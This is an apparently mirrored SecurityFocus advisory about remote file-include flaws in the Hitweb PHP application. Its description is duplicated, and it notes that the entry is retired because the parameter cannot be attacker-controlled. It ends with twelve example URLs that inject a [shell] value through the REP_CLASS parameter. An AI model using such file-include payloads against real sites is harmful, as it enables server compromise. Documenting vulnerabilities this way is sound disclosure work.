26 lines
No EOL
1.8 KiB
Text
26 lines
No EOL
1.8 KiB
Text
source: https://www.securityfocus.com/bid/20060/info
|
|
|
|
Hitweb is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
This BID is being retired. The specified parameter is defined and cannot contain an attacker-specified value.
|
|
|
|
Hitweb is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
This BID is being retired. The specified parameter is defined and cannot contain an attacker-specified value.
|
|
|
|
http://www.example.com/[path]/index.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/arbo.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/framepoint.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/genpage.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/lienvalider.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/appreciation.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/partenariat.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/rechercher.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/projet.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/propoexample.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/refererpoint.php?REP_CLASS=[shell]
|
|
http://www.example.com/[path]/top50.php?REP_CLASS=[shell] |